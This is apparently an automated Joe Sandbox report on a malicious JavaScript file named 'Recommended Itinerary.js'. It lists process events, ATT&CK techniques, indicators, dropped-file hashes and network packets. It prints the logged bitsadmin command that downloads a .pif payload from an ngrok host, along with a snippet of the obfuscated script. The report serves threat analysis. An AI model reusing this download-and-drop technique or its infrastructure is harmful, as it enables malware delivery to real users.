Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: Recommended Itinerary.jsStatic file information: File size 52477564 > 1048576

Persistence and Installation Behavior

barindex
Tries to download files via bitsadmin
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pif
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pifJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\BIT24FD.tmpJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\BIT24FD.tmpJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\BIT24FD.tmpJump to dropped file
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 502Jump to behavior
Source: C:\Windows\System32\svchost.exeDropped PE file which has not been started: C:\Users\user\BIT24FD.tmpJump to dropped file
Source: C:\Windows\System32\svchost.exe TID: 2436Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: svchost.exe, 00000004.00000002.5975110069.00000203C8E8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.5972516733.00000203C722A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exeMemory protected: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\svchost.exeFile created: BIT24FD.tmp.4.drJump to dropped file
JavaScript file contains Antivirus product strings
Source: Recommended Itinerary.jsInitial file: avast, clamav, avira, drweb, eset, avg
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pifJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting		Valid Accounts1
Exploitation for Client Execution		1
BITS Jobs		11
Process Injection		121
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job12
Scripting		1
DLL Side-Loading		2
Virtualization/Sandbox Evasion		LSASS Memory2
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		Logon Script (Windows)1
Disable or Modify Tools		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
BITS Jobs		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets22
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Recommended Itinerary.js0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.ver)0%Avira URL Cloudsafe
https://041224.ngrok-free.app:443//BITZX.pif0%Avira URL Cloudsafe
https://041224.ngrok-free.app//BITZX.pif-0%Avira URL Cloudsafe
https://041224.ngrok-free.app/0%Avira URL Cloudsafe
https://041224.ngrok-free.app//BITZX.pifC:0%Avira URL Cloudsafe
https://041224.ngrok-free.app//BITZX.pif0%Avira URL Cloudsafe
http://www.quovadis.bm00%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
041224.ngrok-free.app
3.134.125.175
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://041224.ngrok-free.app//BITZX.piftrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://041224.ngrok-free.app//BITZX.pifC:bitsadmin.exe, 00000002.00000002.5970078214.0000019F7CC20000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://041224.ngrok-free.app:443//BITZX.pifsvchost.exe, 00000004.00000002.5975189197.00000203C8EA7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://g.live.com/odclientsettings/Prod/C:qmgr.db.4.drfalse
      		high
      http://crl.ver)svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.quovadis.bm0svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://ocsp.quovadisoffshore.com0svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://041224.ngrok-free.app/svchost.exe, 00000004.00000002.5972966531.00000203C7281000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      https://041224.ngrok-free.app//BITZX.pif-svchost.exe, 00000004.00000002.5976216242.00000203C8FD3000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      3.134.125.175
      		041224.ngrok-free.appUnited States
      		16509AMAZON-02UStrue

      Private

      IP
      127.0.0.1

      General Information

      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1576257
      Start date and time:2024-12-16 17:37:08 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 14m 59s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Run name:Suspected Instruction Hammering
      Number of analysed new started processes analysed:15
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Recommended Itinerary.js
      Detection:MAL
      Classification:mal72.evad.winJS@5/5@1/2
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .js
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 23.60.84.144
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: Recommended Itinerary.js

      Simulations

      Behavior and APIs

      TimeTypeDescription
      11:41:14API Interceptor132x Sleep call for process: bitsadmin.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3.134.125.175Implosions.exeGet hashmaliciousRedLineBrowse
      • 0.tcp.ngrok.io:18233/
      S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
      • 3fba-180-252-166-236.ngrok.io/pma/
      CdTyxgQzLV.exeGet hashmaliciousRedLineBrowse
      • 0.tcp.ngrok.io:10680/
      Xo79piwWtL.exeGet hashmaliciousRedLineBrowse
      • 0.tcp.ngrok.io:13447/
      Qfn5i16ago.exeGet hashmaliciousRedLineBrowse
      • 0.tcp.ngrok.io:15384/
      5E9B8DB3AF808A6B409DD2283D3B44A7E88FA70B0D6DE.exeGet hashmaliciousLokibotBrowse
      • 6c21-95-156-231-11.ngrok.io/gentle/fre.php
      Goodwill Encryptor.exeGet hashmaliciousUnknownBrowse
      • 9855-13-235-50-147.ngrok.io/alertmsg.zip
      Goodwill Encryptor.exeGet hashmaliciousUnknownBrowse
      • 9855-13-235-50-147.ngrok.io/alertmsg.zip
      calc.docxGet hashmaliciousUnknownBrowse
      • 816e-182-227-90-53.ngrok.io/
      RnT6mMyI7d.exeGet hashmaliciousHog Grabber ItroublveBOT Stealer XmrigBrowse
      • 6ce0-2001-1bb0-e000-1e-00-c3c.ngrok.io/SHA256SUMS

      Domains

      No context

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      AMAZON-02USzmap.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
      • 54.171.230.55
      spc.elfGet hashmaliciousMiraiBrowse
      • 54.171.230.55
      236236236.elfGet hashmaliciousUnknownBrowse
      • 76.223.105.230
      x86.elfGet hashmaliciousMiraiBrowse
      • 54.171.230.55
      KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
      • 3.6.122.107
      cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
      • 3.6.30.85
      GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
      • 185.166.143.50
      https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#CGet hashmaliciousUnknownBrowse
      • 108.158.75.84
      https://simatantincendi.weebly.com/Get hashmaliciousHTMLPhisherBrowse
      • 44.235.253.37
      zmap.m68k.elfGet hashmaliciousMirai, OkiruBrowse
      • 54.171.230.55

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      28a2c9bd18a11de089ef85a160da29e4d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
      • 3.134.125.175
      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
      • 3.134.125.175
      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
      • 3.134.125.175
      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
      • 3.134.125.175
      RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
      • 3.134.125.175
      https://link.edgepilot.com/s/f30932b1/vPPKRjWXhUuvPsJT0zGKsQ?u=https://lf7oxrhbb.cc.rs6.net/tn.jsp?f=001h06J4Rg18suvxSEI1tED4DAF8iRuyxY1F6LaYcn7sb4iX7GBolUHc7ee-KUx3ocXE9JkVShRAfV1x6aenzzKcDmVc2_grDROu5C380NMdm5zgykpeK24RW4ydxOZY-zzWGqXDAcSMsLIRx7mTviOEg==%26c=rtZvyEmdrWl6DZ9XsciJKGlh47UQUNn-J3NXlYUvzX0mHT2yPp0J7g==%26ch=pbMEYYEPfkmXeu_oUdJD2iMHpz6dLW5FEUtMz_fcwAIrF1HSqrYuCA==%26__=wp-admin/wp/2XWV/Dcndx/c3Njb3R0QGRjbmR4LmNvbQ=%3DGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
      • 3.134.125.175
      n70CrSGL8G.exeGet hashmaliciousRedLineBrowse
      • 3.134.125.175
      Doc_13-35-42.jsGet hashmaliciousUnknownBrowse
      • 3.134.125.175
      Doc_13-35-42.jsGet hashmaliciousUnknownBrowse
      • 3.134.125.175
      https://t.ly/8cSDxGet hashmaliciousUnknownBrowse
      • 3.134.125.175

      Dropped Files

      No context

      Created / dropped Files

      C:\ProgramData\Microsoft\Network\Downloader\edb.log

      Download File
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):1310720
      Entropy (8bit):0.1799461039921363
      Encrypted:false
      SSDEEP:384:mJHL7HbahIfcjcidIiBysHciXBs78MmhRht43mKdyrf6YM5Pai3e9rT:mJP74rzc8Myr43mNrf6YM5Ct9r
      MD5:96B1976568EF2D820259210A6A3F782E
      SHA1:B6522723824FEB88129F8A666D5D61E585BE04C1
      SHA-256:7FB77AA330C4EA2DFB2B5F8BE20B0AE71FC719C0DB74433857D1F74E32ABB29F
      SHA-512:C5CB08F7E6623744CD137D656CB40B57578A84E06FAE20836A61B255DA6B2F449D771667364EF098D056DF5DEC9D7A81CAA569930C1682CC387F2D5FD35061C9
      Malicious:false
      Reputation:low
      Preview:...........@..@.3...{g..*...yo.........<.....).*9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................;..........v[.2}c}c.#.........`h.d...............h.<.....6.:......p..*9...y..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

      Download File
      Process:C:\Windows\System32\svchost.exe
      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe3cc09a4, page size 16384, DirtyShutdown, Windows version 10.0
      Category:dropped
      Size (bytes):1048576
      Entropy (8bit):0.8697456707260486
      Encrypted:false
      SSDEEP:1536:rSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:rapaQK0yfOD8F31Xw
      MD5:6076403CAEA25BDC09A40D0079DB19B9
      SHA1:873601DC072B19407791925633DCD95911C19D18
      SHA-256:A97F844EC1C97ABF090A940A78886CD4C2F1DDECE87BC231059AD75F8BC15C7F
      SHA-512:C1F72082E925170254DC8ACA9E0C5CC32EB0A03C8911908619D4DB8183D715D004B80028363578E9E89A1695879C7667B2E73CF6AD3D864E1628D807B8E620F8
      Malicious:false
      Reputation:low
      Preview:....... ................p..*9...y........................0..........|). '...|#.h.2...........................).*9...y..........................................................................................................bJ......n....@...................................................................................................... ........3...{g......................................................................................................................................................................................................................................E.z '...|A.................DB]. '...|A..........................#......h.2.....................................................................................................................................................................................................................................................................................................................................................

      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

      Download File
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):0.08075927315771983
      Encrypted:false
      SSDEEP:3:I7uuUMsBj4i4uRFE5/ll/n11allo0lJlbxvws:8C1j3LRi5/llv1QL
      MD5:AA7D94600AC866BCA884AF1D4362710B
      SHA1:5750D08FB6226FFE317ED316891655FA000CF590
      SHA-256:F1EE4E0EC361F9AC1490576A6ED09BF5370151D6FB6F73218D76DA458BA6A795
      SHA-512:9DD9D4B9259754FBA801AFEFE7BC58F4A5EF91C624F080ACFE7365A3C7C6B57974C231195D444A38F63879C61B9A7C76B63CA38B79478947DBB7C2622431D5AD
      Malicious:false
      Reputation:low
      Preview:q..=....................................*9...y.. '...|A......|)..............|)......|)..C.t.....|)O................DB]. '...|A.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\BIT24FD.tmp

      Download File
      Process:C:\Windows\System32\svchost.exe
      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):207391736
      Entropy (8bit):0.001700504018574694
      Encrypted:false
      SSDEEP:384:gRkTzRbdQ0blE9huTvItXLq0hZZRwwk7+zVYtO4mWYPEYuMuEuhmEo4MEZEEuomw:hfG9YQPMUG
      MD5:042692E3EAF172961798E998F20A6678
      SHA1:9F42F3995105861E70CEB9B433FF7E84BD2305E5
      SHA-256:C4C18294911CAE81123EAA9768DDEC7902DD7075F075396A6370439E2984C8FA
      SHA-512:7ECCBC82AA89713644156BBF7A8240D5579D8BB2E987A241AE3A5994C22FAFE771D708787D458C592F5AF270658CE5071E39AFBBFF64089749FF069F6B6509E2
      Malicious:true
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pg............................n.... ........@.. ..............................!.\...@................................. ...K...................H.\.............................................................. ............... ..H............text...t.... ...................... ..`.rsrc...............................@....reloc..............................@..B................P.......H........5..,DO.....7....y^.@X...........................................(C...(9...*.0.............*....*.......*....(C...(9...*....*.......*....0.............*....*.......*....(C...(9...*....*.......*....0..........(C... ........8........E................y.......U...=...)...8....(;... ....8....*s ........ ....8....s!........ ....8....s"........ ........8....()... ....~+h..{$h..9m...& ....8b...s#........ ....~+h..{%h..9D...& ....89...(9... ....~+h..{.g..: ...& ....8.......0..

      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

      Download File
      Process:C:\Windows\System32\svchost.exe
      File Type:JSON data
      Category:dropped
      Size (bytes):55
      Entropy (8bit):4.306461250274409
      Encrypted:false
      SSDEEP:
      MD5:DCA83F08D448911A14C22EBCACC5AD57
      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
      Malicious:false
      Reputation:high, very likely benign file
      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

      Static File Info

      General

      File type:ASCII text, with very long lines (65536), with no line terminators
      Entropy (8bit):4.707981177752626
      TrID:
        File name:Recommended Itinerary.js
        File size:52'477'564 bytes
        MD5:2b62d8f8a2cfb1ad9a00d2633b2bb128
        SHA1:5c6cb949735a2f3b6352ed06f4d9ceb700ce0b0c
        SHA256:f40c1d241f0c053f957c7f54019b136b159f2a17ce3e170fc581749f2889e718
        SHA512:241249985093de1c8172ab370d25e885710b792be618d64a4e1f73e5da90dedcf0effa87284fdc8e2575de88addc692ae4a6662e8cf7dcaea6b4d71b5de438dc
        SSDEEP:49152:N31VmU3bO+OfroSe4je0w0qlSk/WabAm3i/HHLov+8grGCRDbhdqi4yUKlNyjmq1:D
        TLSH:11B70251DB6B2FCD7D2C098D046E7E4A4C8D6D323D22C8F1DEDF150B4228AD656B292B
        File Content Preview:(function(_0x33d488,_0x161299){function _0x3a52d3(_0x4a2f73,_0x1932a,_0xa951fb,_0x3c5e73,_0x283d69){return _0x40c7(_0xa951fb- -0x216,_0x283d69);}function _0x36ec67(_0x4cf862,_0x3a63bf,_0x364960,_0x158819,_0x4e9bdd){return _0x40c7(_0x364960-0x346,_0x3a63bf

        File Icon

        Icon Hash:68d69b8bb6aa9a86

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Dec 16, 2024 17:39:37.537120104 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:37.537137985 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:37.537343979 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:37.538942099 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:37.538949966 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:37.870465040 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:37.870678902 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:37.872215986 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:37.872222900 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:37.872461081 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:37.895526886 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:37.942203999 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.362263918 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.362468004 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:38.362468004 CET49709443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:38.362479925 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.363137960 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.363164902 CET443497093.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.400614977 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:38.400635958 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.400880098 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:38.401009083 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:38.401017904 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.724678993 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.725097895 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:38.725106955 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:38.725526094 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:38.725534916 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:39.127198935 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:39.127327919 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:39.127561092 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:39.128012896 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:39.128012896 CET49710443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:39.128029108 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:39.128036022 CET443497103.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.178272009 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.178320885 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.178596020 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.178596020 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.178656101 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.502512932 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.503098965 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.503137112 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.503532887 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.503561020 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.957119942 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.961616039 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:42.961752892 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.961817980 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.961817980 CET49711443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:42.961833954 CET443497113.134.125.175192.168.11.20
